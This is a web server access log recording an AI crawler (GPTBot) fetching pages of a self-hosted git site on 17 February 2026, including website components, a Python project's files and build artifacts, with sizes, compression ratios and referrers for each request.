"/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14828] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" -[17/Feb/2026:15:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" -[17/Feb/2026:15:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15559] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" -[17/Feb/2026:15:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13890] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" -[17/Feb/2026:15:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16486] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" -[17/Feb/2026:15:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13941] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" -[17/Feb/2026:15:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14672] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" -[17/Feb/2026:15:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 10088] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" -[17/Feb/2026:15:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 11133] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" -[17/Feb/2026:15:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 15193] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:15:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" -[17/Feb/2026:15:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md?display=rendered" [Client 74.7.227.38] [Length 13349] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" -[17/Feb/2026:15:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore?display=source" [Client 74.7.227.38] [Length 12227] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" -[17/Feb/2026:15:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8509] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" -[17/Feb/2026:15:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" -[17/Feb/2026:15:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 12013] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:15:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:15:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" -[17/Feb/2026:15:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 10313] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 15768] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9957] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9968] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:15:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" -[17/Feb/2026:15:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10886] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:15:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker?display=rendered" [Client 74.7.227.38] [Length 16259] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:15:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10834] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" -[17/Feb/2026:15:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" -[17/Feb/2026:15:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10830] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" -[17/Feb/2026:15:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include" -[17/Feb/2026:15:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 9966] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12" -[17/Feb/2026:15:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 17255] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site" -[17/Feb/2026:15:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" -[17/Feb/2026:15:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png?display=rendered" [Client 74.7.227.38] [Length 10841] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" -[17/Feb/2026:15:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" -[17/Feb/2026:15:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" -[17/Feb/2026:15:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" -[17/Feb/2026:15:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" -[17/Feb/2026:15:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" -[17/Feb/2026:15:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10833] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" -[17/Feb/2026:15:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" -[17/Feb/2026:15:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" -[17/Feb/2026:15:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" -[17/Feb/2026:15:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10992] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:15:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md?display=source" [Client 74.7.227.38] [Length 11728] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 